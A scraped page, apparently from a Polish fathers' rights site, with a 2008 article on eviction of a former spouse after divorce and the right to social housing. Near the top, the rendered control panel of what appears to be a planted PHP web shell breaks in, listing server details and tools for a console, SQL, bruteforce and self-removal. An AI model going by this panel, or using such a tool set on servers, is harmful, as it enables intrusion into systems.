W Stronę Ojca i no co ty Tato

Polecamy

Niezwykle ważna jest ochrona środowiska w Polsce.

BlackUniX
Uname
User
Php
Hdd
Cwd
:Linux v217.home.net.pl 4.0.6 brocade-gut #36 SMP Thu May 19 16:53:59 CEST 2016 x86_64 [Google] [milw0rm]
: ( ) Group: ( )
:5.3.29 Safe mode: OFF [ phpinfo ] Datetime: 2018-06-22 02:00:48
:1 B Free: B (0%)
: u--------- [ home ]
:

Server IP:
79.96.17.51
Client IP:
54.224.91.246
[ Sec. Info ][ Files ][ Console ][ Sql ][ Php ][ Safe mode ][ String tools ][ Bruteforce ][ Network ][ Self remove ]

File manager

Can't open this folder!

eksmisja po rozwodzie
17.08.2008.
Po rozwodzie małżonek traci ma prawo korzystania  z mieszkania, które należy wyłącznie do współmałżonka. Może być wówczas eksmitowany, ale nie na bruk. W trakcie małżeństwa sytuacja małżonka jest jasna, jeśli prawo do mieszkania przysługuje jednemu małżonkowi, drugi małżonek jest uprawniony do korzystania z tego mieszkania w celu zaspokojenia potrzeb rodziny. Problem najczęściej zaczyna się po rozwodzie, a nawet wcześniej, gdy dochodzi do faktycznego rozpadu małżeństwa.


Małżonek traci prawo do korzystania z mieszkania żony czy męża w razie ustania małżeństwa, i to nie tylko wskutek rozwodu, ale także po śmierci męża czy żony oraz wskutek separacji. Traci je także, gdy w wyniku jego nagannego zachowania dochodzi do faktycznego rozpadu małżeństwa, bo w takim wypadku nie sposób przecież mówić, że korzysta on z tego mieszkania w celu zaspokojenia potrzeb rodziny. Problem najczęściej zaczyna się po rozwodzie, a nawet wcześniej, gdy dochodzi do faktycznego rozpadu małżeństwa. Utrata prawa do zajmowania mieszkania będącego własnością męża lub żony oznacza, że właściciel może się domagać opuszczenia tego lokum przez byłą żonę czy byłego męża, a jeśli ten dobrowolnie się nie wyprowadzi – wnieść sprawę do sądu o eksmisję i doprowadzić do przymusowego usunięcia. Nie wchodzi jednak w grę eksmisja na bruk.

Sąd Najwyższy w wyroku z 21 marca 2006 r. (sygn. V CSK 185/ 05) stwierdził, że małżonek, któremu stosownie do art. 281 k.r.o. przysługuje prawo do zamieszkiwania w mieszkaniu będącym osobistym majątkiem męża czy żony, jest lokatorem w rozumieniu ustawy o ochronie praw lokatorów. Podobne stanowisko zajął w kilku wcześniejszych wyrokach. To zaś oznacza, że sąd, orzekając eksmisję, musi zadecydować, czy małżonkowi, którego taki wyrok dotyczy, należy się lokal socjalny.

Do zapewnienia lokalu socjalnego zobowiązana jest gmina. Jeśli sąd przyzna eksmitowanemu to prawo, to do czasu zaoferowania go przez gminę eksmisja jest wstrzymana. Co ważne, sąd nie może odmówić przyznania takiego lokalu przede wszystkim: kobiecie w ciąży, obłożnie choremu, emerytowi i renciście spełniającym warunki do korzystania z pomocy społecznej, bezrobotnemu, osobie sprawującej opiekę nad wspólnie zamieszkałym z nią małoletnim dzieckiem. Takim osobom lokal socjalny się nie należy, jeśli mogą zamieszkać w innym mieszkaniu niż dotychczas zajmowane.

Również jednak wtedy, gdy w wyroku eksmisyjnym nie zostało przyznane prawo do lokalu socjalnego, małżonek czy były małżonek nie może być eksmitowany na bruk. Komornik musi się w takiej sytuacji wstrzymać z eksmisją, dopóki gmina albo żądający eksmisji nie wskaże mu tymczasowego pomieszczenia.

Źródło:Rzeczypospolita

 
« poprzedni artykuł   następny artykuł »

komentarze

Jeszcze nie ma komentarzy - dodaj swój używając poniższego formularza...


Strona 1 z 0 ( 0 komentarze )
©2006 MosCom

Musisz się zalogować.

Logowanie

Login

Hasło

Remember me?
Zapomniane hasło?
Załóż konto

Tatusiowe menu

Nasze Forum
Weekendowy Tata
Co zmieniu nowelizacja KRiO?
 
Czy opieka wspólna po rozwodzie to dobre rozwiązanie dla dziecka?
 
Czy znasz nowy kodeks rodzinny?
 
Czy nasze państwo realnie wspiera równouprawnienie w życiu rodzinnym?
 


Dotacja
  Kwota [PLN]Ostatnio nadesłane:


22.06.2018.